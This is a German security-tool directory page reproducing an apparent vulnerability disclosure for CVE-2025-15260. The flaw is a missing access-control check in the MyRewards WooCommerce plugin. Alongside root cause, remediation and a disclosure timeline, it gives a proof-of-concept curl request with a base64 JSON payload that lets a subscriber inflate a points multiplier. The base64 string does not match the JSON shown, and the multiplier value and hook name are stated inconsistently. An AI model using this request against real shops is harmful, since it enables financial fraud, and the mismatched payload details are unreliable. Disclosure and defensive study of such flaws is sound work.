Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-15260 — Fehlende Autorisierung / Defekte Zugriffskontrolle im Plugin - MyRewards – Loyalty Points and Rewards for WooCommerce | Kitploit
Tools/GitHubGitHub/d3kc4rt1/cve-2025-15260
Privilege EscalationSchwachstellenanalyseWebanwendungs-ExploitationPenetrationstestsPapers & ForschungLernen & Bildung
GitHubd3kc4rt1/cve-2025-15260

CVE-2025-15260

Fehlende Autorisierung / Defekte Zugriffskontrolle im Plugin - MyRewards – Loyalty Points and Rewards for WooCommerce

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-15260: Fehlende Autorisierung / Gebrochene Zugriffskontrolle im Plugin - MyRewards – Treuepunkte und Belohnungen für WooCommerce

Haftungsausschluss: Dieses Repository wurde nur für Bildungszwecke und ethische Offenlegung erstellt. Die Schwachstelle wurde verantwortungsvoll an den Anbieter gemeldet und behoben. Verwenden Sie diese Informationen nicht, um Systeme ohne entsprechende Autorisierung auszunutzen.

Zusammenfassung

Eine kritische Schwachstelle in der Zugriffskontrolle / Privilegienausweitung wurde im MyRewards (WooRewards)-Plugin für WooCommerce (Versionen <= 5.6.0) entdeckt. Dieser Fehler erlaubt jedem angemeldeten Benutzer, auch solchen mit minimalen Rechten wie Abonnenten, die Autorisierung zu umgehen und sensible Shop-Belohnungsregeln zu ändern.

Durch Ausnutzung dieser Schwachstelle kann ein Angreifer seinen Treuepunkte-Multiplikator auf einen astronomischen Wert (z.B. 999.999.999) erhöhen, wodurch er aus einem einzigen kleinen Kauf massive Punkte ansammeln und gegen Gutscheine oder kostenlose Produkte einlösen kann, was zu direkten finanziellen Verlusten für den Shop führt.

Schwachstellenübersicht

  • CVE ID: CVE-2025-15260
  • Produkt: MyRewards von LongwayStudio (WooCommerce-Plugin)
  • Betroffene Versionen: <= 5.6.0
  • Schwachstellentyp: Gebrochene Zugriffskontrolle / Privilegienausweitung (CWE-284)
  • Erforderliche Berechtigungen: Authentifiziert (Abonnent oder höher)

Technische Tiefe & Ursache

Die Hauptursache dieser Schwachstelle liegt im Versäumnis, Capability Checks oder CSRF-Schutz auf kritischen AJAX-Endpunkten zu implementieren, die Datenbankänderungen verwalten.

1. Nicht autorisierte AJAX-Registrierung: Das Plugin verwendet eine generische Controller-Klasse (EditlistControler) zur Verwaltung von CRUD-Operationen. In editlistcontroler.php registriert es die AJAX-Aktion editlist mit dem Hook gwp_ajax_, wodurch sie ALLEN angemeldeten Benutzern unabhängig von ihrer Rolle zur Verfügung steht:

root@kitploit:~
add_action('wp_ajax_lws_adminpanel_editlist', array($this, 'ajax'));

2. Fehlen der Autorisierung und Nonce-Validierung: Innerhalb der Methoden ajax() und accept() verarbeitet der Code zustandsändernde Anfragen (z.B. put zum Aktualisieren, del zum Löschen) ausschließlich auf Basis der Benutzereingabe. Es fehlen vollständig Aufrufe von current_user_can() und check_ajax_referer(), was bedeutet, dass nicht überprüft wird, ob der Benutzer über manage_woocommerce-Rechte verfügt.

3. Gefährliche Payload-Verarbeitung: Der Endpunkt akzeptiert einen Base64-kodierten JSON-String über den Parameter line, der dekodiert und direkt an die Methode EventList::write() übergeben wird, wodurch die bösartigen Einstellungen direkt in der Datenbank gespeichert werden:

root@kitploit:~
$data = json_decode(base64_decode($line), true);
$this->m_Source->write($data);

Geschäftliche Auswirkungen

  • Finanzieller Verlust: Durch Manipulation des Punkte-Multiplikators für den Bestellbetrag können Angreifer unendliche Prämienpunkte erzeugen und gegen hochwertige Rabattgutscheine oder kostenlose Artikel eintauschen, wobei das E-Commerce-Zahlungsgateway umgangen wird.
  • Privilegienausweitung: Ein normaler Kunde (Abonnent) kann Plugin-Verwaltungsaktionen durchführen.
  • Kompromittierung der Datenintegrität: Angreifer können bestehende legitime Belohnungsregeln verunstalten, ändern oder löschen und so die Marketinglogik des Shops stören.

Proof of Concept (PoC)

Die folgenden Schritte zeigen, wie ein authentifizierter Abonnent diesen Fehler ausnutzen kann.

1. Voraussetzungen

  • Ziel, das WooCommerce mit MyRewards v5.6.0 ausführt.
  • Gültige Anmeldedaten für ein Konto auf subscriber-Ebene.
  • Ein vorkonfiguriertes Belohnungssystem (z.B. Regel "Geld ausgeben" zum Punkte sammeln). Hinweis: Die ID dieser Regel (z.B. 101) ist sequentiell und leicht durch Beobachtung der AJAX-Post-Antworten ermittelbar.

2. Payload

Wir möchten den Punkte-Multiplikator der Regel-ID 101 auf 999,999,999,999,999 aktualisieren.

Initial JSON

root@kitploit:~
{
  "post_id":"101",
  "wre_type":"lws_woorewards_events_orderamount",
  "lws_woorewards_events_orderamount_multiplier": "999999999999999"
}

Base64-kodiert ('value of line')

root@kitploit:~
eyJwb3N0X2lkIjoiMTAxIiwid3JlX3R5cGUiOiJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnQiLCJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnRfbWVsdGlwbGl1ciI6ICI5OTk5OTk5OTk5OTk5OTk5In0

3. Führen Sie den Angriff aus

Führen Sie die folgende CURL-Anfrage als Benutzer mit niedrigen Rechten aus:

root@kitploit:~
curl -i -X POST 'http://TARGET_SITE/wp-admin/admin-ajax.php' \
    -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
    -b '[Subscriber_Cookies_Here]' \
    -d 'action=lws_adminpanel_editlist&method=put&id=EventList&line=eyJwb3N0X2lkIjoiMTAxIiwid3JlX3R5cGUiOiJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnQiLCJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnRfbWVsdGlwbGl1ciI6ICI5OTk5OTk5OTk5OTk5OTk5In0'

4. Überprüfung

  • Ansicht des Angreifers: Der Server gibt {"status":1} zurück, was die Aktualisierung bestätigt.
  • Ansicht des Administrators: Wenn ein Administrator die Treueeinstellungen aufruft, wird er sehen, dass der Punkte-Multiplikator für Bestellungen auf den vom Angreifer eingeschleusten astronomischen Wert geändert wurde.

Abhilfe

Um dieses Problem zu beheben, aktualisieren Sie das MyRewards-Plugin auf die neueste gepatchte Version. Der Anbieter hat dies behoben durch:

  1. Implementierung von current_user_can()-Prüfungen im AJAX-Controller zur Überprüfung administrativer Berechtigungen.
  2. Hinzufügen von check_ajax_referer() zur Validierung von Nonces und zur Verhinderung von Cross-Site Request Forgery (CSRF).

Zeitplan

Ein kurzer Ablauf des Offenlegungsprozesses, um zu zeigen, dass ethische Standards eingehalten wurden:

  • Datum (2025-12-29): Gemeldet an Wordfence / Entwickler.
  • Datum (2026-02-09): Schwachstelle behoben / Öffentliche Offenlegung.

Referenzen & Danksagungen

  • Wordfence Vulnerability Database
  • CVE-2025-15260 on NVD
  • MyRewards Plugin on WordPress.org
Tool herunterladen